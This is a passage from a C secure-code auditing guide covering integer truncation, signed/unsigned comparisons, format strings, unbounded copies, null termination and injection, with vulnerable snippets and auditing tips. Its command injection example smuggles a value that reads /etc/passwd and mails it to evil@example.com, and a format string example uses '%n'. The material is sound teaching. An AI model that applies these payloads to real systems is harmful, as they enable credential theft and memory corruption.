- Auditing Tip: Focus on signed
char
orshort
used in contexts promoting them toint
(arithmetic, comparisons, function args). Check assembly formovsx
instruction.
- 5.3 Truncation
- Description: Converting a larger integer type to a smaller type discards the most significant bits. Can bypass size checks if a large value is truncated to a small one before the check or copy.
- Example (strlen result truncated):
unsigned short f; // 16-bit char mybuf[1024]; char *userstr = getuserstr(); // Assume returns string > 65535 chars // strlen returns size_t (e.g., 32/64-bit), maybe 66000 f = strlen(userstr); // Truncation: f becomes 66000 % 65536 = 464 if (f > sizeof(mybuf)-5) // Check is 464 > 1019 -> false die("string too long!"); // Check bypassed, large userstr overflows mybuf strcpy(mybuf, userstr);
- Auditing Tip: Look for assignments from larger types (int, size_t) to smaller types (short, char), especially when used for lengths or sizes. Check struct definitions.
- 5.4 Comparisons
- Description: Implicit type conversions during comparisons are a major source of bugs. Promotion of signed to unsigned is common when comparing against
size_t
or other unsigned types. - Example (Signed vs Unsigned size_t):
short length = 1; // From network // sizeof(short) is size_t (unsigned) // In (length - sizeof(short)), length promoted to int, then converted to unsigned size_t // Result of subtraction is unsigned. if (length - sizeof(short) <= 0) // Unsigned result can never be <= 0 (unless 0) { /* This check is ineffective for small positive lengths */ } // read(sockfd, buf, length - sizeof(short)); // If length=1, read size becomes (unsigned)(1-2) = large value
- Example (Signed vs Unsigned Max Check):
unsigned short max = 1024; short length = -5; // From network // Both promoted to int for comparison. // Check is effectively (-5 > 1024) -> false. Check bypassed. if(length > max) { /* error */ } // read(sockfd, buf, length); // read gets negative length -> interpreted as large unsigned size_t
- Auditing Tip: Scrutinize comparisons protecting memory operations. Track variable types carefully. Watch for
sizeof
,strlen
. Comparisons likeif (unsigned_var < 0)
are suspicious.
- Description: Implicit type conversions during comparisons are a major source of bugs. Promotion of signed to unsigned is common when comparing against
- 5.5 Operators
- Subtraction: Integer promotions happen before the operation.
(unsigned short)1 - 5
is calculated as(int)1 - (int)5 = -4
. The result type affects subsequent comparisons or assignments. - Division/Modulus: Signed division/modulus with negative operands can yield negative results (implementation-defined prior to C99, typically rounds towards zero or negative infinity). If a negative result is used in size calculations (e.g.,
malloc(len/8 + 1)
), it could lead to allocating 0 or small amount, followed by operations assuming larger buffer. - Right Shift: Right shifting (
>>
) a signed negative value performs an arithmetic shift, preserving the sign bit (filling with 1s). If a logical shift (filling with 0s) was expected, this can lead to unexpected large negative or positive values depending on context. Check assembly:sar
(arithmetic) vsshr
(logical). - Auditing Tip: Check operands for signed division, modulus, right shift. Can user input control operands to be negative?
- Subtraction: Integer promotions happen before the operation.
6. Information Disclosure
- 6.1 Memory Disclosure
- Description: Leaking contents of memory, often due to missing bounds checks on reads, use of uninitialized memory, or incorrect handling of internal data structures. Heartbleed (OpenSSL) was a famous example where missing bounds check allowed reading arbitrary server memory.
- Example: (Conceptual based on cheatsheet description of OpenSSL flaw)
// If SSL_read has an internal flaw allowing read past intended data // due to error condition mishandling or bad length calculation, // buffer might contain adjacent memory contents. bytes_read = SSL_read(ssl, buffer, sizeof(buffer)); // Printing buffer leaks unintended data.
- 6.3 Debug Information Leakage
- Description: Accidentally exposing internal state, variable values, or verbose logs intended only for debugging. Often happens when debug code is left enabled in production builds or triggered by specific inputs.
- Example: (Conceptual based on cheatsheet description of curl flaw)
// If curl's URL parser had a flaw where a crafted URL format string // triggered verbose debug output intended for developers, that output // might leak internal state or sensitive info processed by curl. curl_easy_setopt(curl, CURLOPT_URL, malicious_url); curl_easy_perform(curl); // Debug info printed to console/log
7. Cryptographic Weaknesses
- 7.1 Weak Encryption Algorithm
- Description: Using cryptographic algorithms known to be weak or compromised (e.g., DES, MD5 for hashing passwords, RC4 in some contexts). Does not provide adequate confidentiality or integrity against modern attacks.
- Example: (Conceptual based on cheatsheet description of PHP mcrypt)
// Using MCRYPT_DES makes the encryption vulnerable. // Should use stronger algorithms like AES (e.g., MCRYPT_RIJNDAEL_128). td = mcrypt_module_open(MCRYPT_DES, ...);
- 7.2 Predictable Random Number Generation
- Description: Using pseudo-random number generators (PRNGs) that are improperly seeded or inherently weak, allowing attackers to predict their output. Critical for session tokens, cryptographic keys, nonces, etc.. Seeding with predictable values like time or process ID is insecure. Use cryptographically secure PRNGs (CPRNGs) provided by the OS or crypto libraries.
- Example: (Conceptual based on cheatsheet description of OpenSSL flaw)
// If RAND_bytes() relies on a PRNG state that wasn't properly seeded // with sufficient entropy (e.g., /dev/urandom or platform equivalent), // the output might be predictable, especially on embedded systems or // VMs immediately after boot. if (!RAND_bytes(random_bytes, sizeof(random_bytes))) { /* error */ }
8. String Vulnerabilities
- 8.1 Format String Vulnerabilities
- Description: User input controls the format string argument to
printf
family functions. Allows reading stack memory (%x
), dereferencing pointers (%s
), and writing to memory (%n
). - Example: (Conceptual based on cheatsheet curl example)
// If url is "[http://example.com/%x%x%n](http://example.com/%x%x%n)" and passed somehow // as format string to printf-like function internally. printf(url); // Vulnerable if url comes from user
- Auditing Tip: Search
printf
,sprintf
,syslog
, etc. for non-static format strings. Trace back to user input.
- Description: User input controls the format string argument to
- 8.2 Unbounded String Copies
- Description: Using functions like
strcpy
,strcat
,sprintf
(no size limit),gets
that don't prevent writing past the end of the destination buffer. - Example:
char Password[80]; // gets() is inherently unsafe, reads until newline regardless of buffer size gets(Password); // Classic stack buffer overflow if input > 79 chars
- Algorithm:
type STRING[SIZE] func_read_unbounded(STRING) // Input copied > SIZE
- Description: Using functions like
- 8.3 Null-Termination Errors
- Description: Strings not properly terminated with a null character (
\0
). Functions relying on NUL termination (likestrlen
,strcpy
,printf %s
) will read past the intended end of the string data into adjacent memory. Can happen withstrncpy
if source >= destination size. - Example:
char a[16]; char b[16]; char c[32]; // strncpy does not guarantee null termination if src >= dest size strncpy(a, "0123456789abcdef", sizeof(a)); // a might not be null-terminated strncpy(b, "0123456789abcdef", sizeof(b)); // b might not be null-terminated // If a is not null-terminated, strcpy reads past end of 'a' into 'b' etc. strcpy(c, a); // Potential read overflow if 'a' wasn't terminated
- Algorithm:(Interpreted - copy without ensuring null term)
type DEST[SIZE_DEST], SRC[SIZE_SRC] // where SIZE_SRC >= SIZE_DEST func_bounded_copy_no_term(DEST, SRC, SIZE_DEST) // DEST may not have '\0' func_read_terminated(DEST) // Reads past end of DEST buffer
- Description: Strings not properly terminated with a null character (
- 8.4 String Truncation
- Description: Cutting a string short, often by bounded copy functions (
strncpy
,snprintf
). Can be a vulnerability if critical data is lost (e.g., path components, security suffixes) or if subsequent code assumes the full string was processed.snprintf
may return the number of bytes needed, requiring careful checking against buffer size. Also relates to null-termination if truncation prevents the null byte from being written. - Example:
char destination[5]; char source[] = "This is a long string"; // Copies only first 5 bytes: "This " // No null terminator is written because source size >= dest size. strncpy(destination, source, sizeof(destination)); // printf reads past end of destination buffer into adjacent memory. printf("%s\n", destination);
- Algorithm:
type SOURCE[], DEST[SIZE] // SOURCE length >= SIZE func_safe_copy_truncates(DEST, SOURCE, SIZE) // DEST contains first SIZE bytes of SOURCE, maybe no '\0' use(DEST) // Subsequent use assumes full string or expects '\0'
- Description: Cutting a string short, often by bounded copy functions (
- 8.5 Improper Data Sanitization (Command/SQL/Path Injection)
- Description: Failing to validate, sanitize, or escape user-controlled input that is used to construct commands, queries, file paths, or other strings with special syntax (metacharacters). Allows attackers to inject malicious syntax.
- Example (Command Injection):
char buffer[200]; char *addr = "bogus@addr.com; cat /etc/passwd | mail evil@example.com"; // User input // Constructing command string with unsanitized input sprintf(buffer, "/bin/mail %s < /tmp/email", addr); // Executes /bin/mail bogus@addr.com; cat /etc/passwd | mail evil@example.com system(buffer);
- Algorithm:
type DATA = user_input_with_metachars type COMMAND = construct_string("cmd ", DATA) func_exec(COMMAND)